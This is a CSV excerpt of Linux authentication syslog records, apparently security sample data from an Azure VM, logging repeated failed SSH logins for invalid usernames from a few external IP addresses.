+12667,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:48:09,UbuntuDevEnv,2019-06-26 03:48:08,auth,UbuntuDevEnv,info,Failed password for invalid user kenneth from 106.13.4.172 port 36142 ssh2,118076,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,kenneth,106.13.4.1,36142,,
+12668,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:48:09,UbuntuDevEnv,2019-06-26 03:48:09,auth,UbuntuDevEnv,info,Disconnected from invalid user kenneth 106.13.4.172 port 36142 [preauth],118076,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,kenneth,106.13.4.1,36142,,
+12669,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:48:09,UbuntuDevEnv,2019-06-26 03:48:09,auth,UbuntuDevEnv,info,Received disconnect from 106.13.4.172 port 36142:11: Bye Bye [preauth],118076,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.13.4.1,36142,,
+12670,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:48:45,UbuntuDevEnv,2019-06-26 03:48:44,auth,UbuntuDevEnv,info,Invalid user nagios from 106.13.4.172 port 41008,118210,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios,106.13.4.1,41008,,
+12671,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:48:45,UbuntuDevEnv,2019-06-26 03:48:44,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,118210,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12672,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:48:45,UbuntuDevEnv,2019-06-26 03:48:44,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.4.172,118210,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.13.4.1,,0,
+12673,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:48:47,UbuntuDevEnv,2019-06-26 03:48:46,auth,UbuntuDevEnv,info,Failed password for invalid user nagios from 106.13.4.172 port 41008 ssh2,118210,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios,106.13.4.1,41008,,
+12674,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:48:47,UbuntuDevEnv,2019-06-26 03:48:46,auth,UbuntuDevEnv,info,Disconnected from invalid user nagios 106.13.4.172 port 41008 [preauth],118210,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios,106.13.4.1,41008,,
+12675,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:48:47,UbuntuDevEnv,2019-06-26 03:48:46,auth,UbuntuDevEnv,info,Received disconnect from 106.13.4.172 port 41008:11: Bye Bye [preauth],118210,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.13.4.1,41008,,
+12676,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:49:01,UbuntuDevEnv,2019-06-26 03:49:00,auth,UbuntuDevEnv,info,Invalid user feng from 118.24.131.236 port 57688,118342,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,feng,118.24.131.2,57688,,
+12677,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:49:01,UbuntuDevEnv,2019-06-26 03:49:00,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.24.131.236,118342,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.24.131.2,,0,
+12678,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:49:01,UbuntuDevEnv,2019-06-26 03:49:00,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,118342,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12679,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:49:02,UbuntuDevEnv,2019-06-26 03:49:02,auth,UbuntuDevEnv,info,Failed password for invalid user feng from 118.24.131.236 port 57688 ssh2,118342,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,feng,118.24.131.2,57688,,
+12680,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:49:03,UbuntuDevEnv,2019-06-26 03:49:02,auth,UbuntuDevEnv,info,Disconnected from invalid user feng 118.24.131.236 port 57688 [preauth],118342,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,feng,118.24.131.2,57688,,
+12681,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:49:03,UbuntuDevEnv,2019-06-26 03:49:02,auth,UbuntuDevEnv,info,Received disconnect from 118.24.131.236 port 57688:11: Bye Bye [preauth],118342,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.24.131.2,57688,,
+12682,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:49:12,UbuntuDevEnv,2019-06-26 03:49:11,auth,UbuntuDevEnv,info,Invalid user oleta from 43.242.215.70 port 13280,118396,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oleta,43.242.215.7,13280,,
+12683,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:49:12,UbuntuDevEnv,2019-06-26 03:49:11,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,118396,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12684,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:49:12,UbuntuDevEnv,2019-06-26 03:49:11,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=43.242.215.70,118396,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,43.242.215.7,,0,
+12685,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:49:13,UbuntuDevEnv,2019-06-26 03:49:13,auth,UbuntuDevEnv,info,Failed password for invalid user oleta from 43.242.215.70 port 13280 ssh2,118396,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oleta,43.242.215.7,13280,,
+12686,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:49:14,UbuntuDevEnv,2019-06-26 03:49:13,auth,UbuntuDevEnv,info,Received disconnect from 43.242.215.70 port 13280:11: Bye Bye [preauth],118396,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.242.215.7,13280,,
+12687,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:49:14,UbuntuDevEnv,2019-06-26 03:49:13,auth,UbuntuDevEnv,info,Disconnected from invalid user oleta 43.242.215.70 port 13280 [preauth],118396,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oleta,43.242.215.7,13280,,
+12688,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:49:23,UbuntuDevEnv,2019-06-26 03:49:22,auth,UbuntuDevEnv,info,Invalid user jeanclaude from 106.13.4.172 port 45872,118427,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jeanclaude,106.13.4.1,45872,,
+12689,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:49:23,UbuntuDevEnv,2019-06-26 03:49:23,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.4.172,118427,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.13.4.1,,0,
+12690,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:49:23,UbuntuDevEnv,2019-06-26 03:49:23,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,118427,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12691,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:49:25,UbuntuDevEnv,2019-06-26 03:49:25,auth,UbuntuDevEnv,info,Failed password for invalid user jeanclaude from 106.13.4.172 port 45872 ssh2,118427,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jeanclaude,106.13.4.1,45872,,
+12692,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:49:25,UbuntuDevEnv,2019-06-26 03:49:25,auth,UbuntuDevEnv,info,Disconnected from invalid user jeanclaude 106.13.4.172 port 45872 [preauth],118427,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jeanclaude,106.13.4.1,45872,,
+12693,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:49:25,UbuntuDevEnv,2019-06-26 03:49:25,auth,UbuntuDevEnv,info,Received disconnect from 106.13.4.172 port 45872:11: Bye Bye [preauth],118427,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.13.4.1,45872,,
+12694,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:50:02,UbuntuDevEnv,2019-06-26 03:50:02,auth,UbuntuDevEnv,info,Invalid user abby from 106.13.4.172 port 50734,118563,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,abby,106.13.4.1,50734,,from
+12695,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:50:02,UbuntuDevEnv,2019-06-26 03:50:02,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,118563,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12696,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:50:02,UbuntuDevEnv,2019-06-26 03:50:02,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.4.172,118563,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.13.4.1,,0,
+12697,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:50:05,UbuntuDevEnv,2019-06-26 03:50:04,auth,UbuntuDevEnv,info,Failed password for invalid user abby from 106.13.4.172 port 50734 ssh2,118563,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,abby,106.13.4.1,50734,,from
+12698,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:50:05,UbuntuDevEnv,2019-06-26 03:50:04,auth,UbuntuDevEnv,info,Disconnected from invalid user abby 106.13.4.172 port 50734 [preauth],118563,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,abby,106.13.4.1,50734,,
+12699,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:50:05,UbuntuDevEnv,2019-06-26 03:50:04,auth,UbuntuDevEnv,info,Received disconnect from 106.13.4.172 port 50734:11: Bye Bye [preauth],118563,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.13.4.1,50734,,
+12700,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:50:32,UbuntuDevEnv,2019-06-26 03:50:31,auth,UbuntuDevEnv,info,Invalid user basson from 118.24.131.236 port 42154,118675,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,basson,118.24.131.2,42154,,
+12701,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:50:32,UbuntuDevEnv,2019-06-26 03:50:31,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,118675,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12702,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:50:32,UbuntuDevEnv,2019-06-26 03:50:31,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.24.131.236,118675,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.24.131.2,,0,
+12703,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:50:34,UbuntuDevEnv,2019-06-26 03:50:33,auth,UbuntuDevEnv,info,Failed password for invalid user basson from 118.24.131.236 port 42154 ssh2,118675,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,basson,118.24.131.2,42154,,
+12704,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:50:34,UbuntuDevEnv,2019-06-26 03:50:33,auth,UbuntuDevEnv,info,Received disconnect from 118.24.131.236 port 42154:11: Bye Bye [preauth],118675,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.24.131.2,42154,,
+12705,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:50:34,UbuntuDevEnv,2019-06-26 03:50:33,auth,UbuntuDevEnv,info,Disconnected from invalid user basson 118.24.131.236 port 42154 [preauth],118675,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,basson,118.24.131.2,42154,,
+12706,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:50:40,UbuntuDevEnv,2019-06-26 03:50:39,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,118702,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12707,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:50:40,UbuntuDevEnv,2019-06-26 03:50:39,auth,UbuntuDevEnv,info,Invalid user adam from 106.13.4.172 port 55602,118702,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,adam,106.13.4.1,55602,,
+12708,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:50:40,UbuntuDevEnv,2019-06-26 03:50:39,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.4.172,118702,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.13.4.1,,0,
+12709,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:50:42,UbuntuDevEnv,2019-06-26 03:50:41,auth,UbuntuDevEnv,info,Failed password for invalid user adam from 106.13.4.172 port 55602 ssh2,118702,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,adam,106.13.4.1,55602,,
+12710,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:50:42,UbuntuDevEnv,2019-06-26 03:50:41,auth,UbuntuDevEnv,info,Disconnected from invalid user adam 106.13.4.172 port 55602 [preauth],118702,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,adam,106.13.4.1,55602,,
+12711,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:50:42,UbuntuDevEnv,2019-06-26 03:50:41,auth,UbuntuDevEnv,info,Received disconnect from 106.13.4.172 port 55602:11: Bye Bye [preauth],118702,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.13.4.1,55602,,
+12712,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:51:08,UbuntuDevEnv,2019-06-26 03:51:08,auth,UbuntuDevEnv,info,Invalid user travis from 43.242.215.70 port 36637,118812,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,travis,43.242.215.7,36637,,
+12713,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:51:08,UbuntuDevEnv,2019-06-26 03:51:08,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=43.242.215.70,118812,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,43.242.215.7,,0,
+12714,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:51:08,UbuntuDevEnv,2019-06-26 03:51:08,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,118812,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12715,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:51:11,UbuntuDevEnv,2019-06-26 03:51:10,auth,UbuntuDevEnv,info,Failed password for invalid user travis from 43.242.215.70 port 36637 ssh2,118812,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,travis,43.242.215.7,36637,,
+12716,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:51:11,UbuntuDevEnv,2019-06-26 03:51:10,auth,UbuntuDevEnv,info,Disconnected from invalid user travis 43.242.215.70 port 36637 [preauth],118812,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,travis,43.242.215.7,36637,,
+12717,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:51:11,UbuntuDevEnv,2019-06-26 03:51:10,auth,UbuntuDevEnv,info,Received disconnect from 43.242.215.70 port 36637:11: Bye Bye [preauth],118812,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.242.215.7,36637,,
+12718,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:51:19,UbuntuDevEnv,2019-06-26 03:51:18,auth,UbuntuDevEnv,info,Invalid user shaun from 106.13.4.172 port 60470,118850,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,shaun,106.13.4.1,60470,,
+12719,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:51:19,UbuntuDevEnv,2019-06-26 03:51:18,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,118850,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12720,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:51:19,UbuntuDevEnv,2019-06-26 03:51:18,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.4.172,118850,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.13.4.1,,0,
+12721,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:51:20,UbuntuDevEnv,2019-06-26 03:51:20,auth,UbuntuDevEnv,info,Failed password for invalid user shaun from 106.13.4.172 port 60470 ssh2,118850,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,shaun,106.13.4.1,60470,,
+12722,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:51:21,UbuntuDevEnv,2019-06-26 03:51:20,auth,UbuntuDevEnv,info,Received disconnect from 106.13.4.172 port 60470:11: Bye Bye [preauth],118850,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.13.4.1,60470,,
+12723,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:51:21,UbuntuDevEnv,2019-06-26 03:51:20,auth,UbuntuDevEnv,info,Disconnected from invalid user shaun 106.13.4.172 port 60470 [preauth],118850,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,shaun,106.13.4.1,60470,,
+12724,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:51:58,UbuntuDevEnv,2019-06-26 03:51:57,auth,UbuntuDevEnv,info,Invalid user sklopaket from 106.13.4.172 port 37100,118982,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sklopaket,106.13.4.1,37100,,
+12725,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:51:58,UbuntuDevEnv,2019-06-26 03:51:57,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,118982,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12726,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:51:58,UbuntuDevEnv,2019-06-26 03:51:57,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.4.172,118982,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.13.4.1,,0,
